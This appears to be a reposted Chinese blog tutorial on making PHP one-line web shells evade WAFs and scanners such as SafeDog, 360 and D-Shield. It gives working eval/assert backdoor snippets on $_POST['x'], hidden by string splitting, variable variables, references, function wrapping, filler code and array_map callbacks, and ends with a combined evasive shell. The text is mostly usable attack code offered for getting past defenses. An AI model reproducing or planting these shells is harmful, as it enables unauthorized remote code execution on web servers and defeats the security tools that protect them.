【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路

00x1.关键字拆分

比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

可变变量:  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
测试结果:

总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!
引用:  比如$a=$_POST[‘x’];$b=&$a;@eval($b);

测试结果: 

总结:这种方法与上一种方法类似。
可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
测试结果: 

总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码

添加其他代码  比如  if(empty($a))

{
           $a=$_POST[‘x’];
 }

  @eval($a);

测试结果:

总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

使用其他函数,比如eval可以使用assert替换。
总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

               eval($a);

 }

 test($_POST[‘x’]);

测试结果: 

总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

使用其他函数进行调用,并执行。
如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
测试结果: 

总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

00x7.利用各种方法的特性写出过WAF的一句话。

 <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>

测试结果:

转自:https://www.cnblogs.com/xishaonian/p/6129002.html

  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值